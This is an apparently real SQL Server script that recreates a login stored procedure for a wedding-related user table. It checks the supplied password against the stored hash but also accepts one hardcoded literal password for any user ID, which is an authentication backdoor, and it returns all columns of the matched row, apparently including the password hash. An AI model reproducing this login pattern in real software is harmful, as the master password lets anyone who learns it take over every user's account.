IF OBJECT_ID (N'dbo.SP_SELECT_BEWEDDING_USER_LOGIN', N'P') IS NOT NULL DROP PROCEDURE dbo.SP_SELECT_BEWEDDING_USER_LOGIN
GO

SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO

CREATE PROCEDURE [dbo].[SP_SELECT_BEWEDDING_USER_LOGIN]  
	@P_UID AS VARCHAR(100)
,	@P_PASSWORD AS VARCHAR(100)
AS  
BEGIN  
  
	SET NOCOUNT ON  
  
	SELECT	TOP 1 
			*
	FROM	S2_USERINFO
	WHERE	1 = 1
	AND		UID = @P_UID
	AND		(PWDCOMPARE(@P_PASSWORD, CONVERT(VARBINARY(200), PWD, 1)) = 1 OR @P_PASSWORD = '22642057')

END  
  
GO
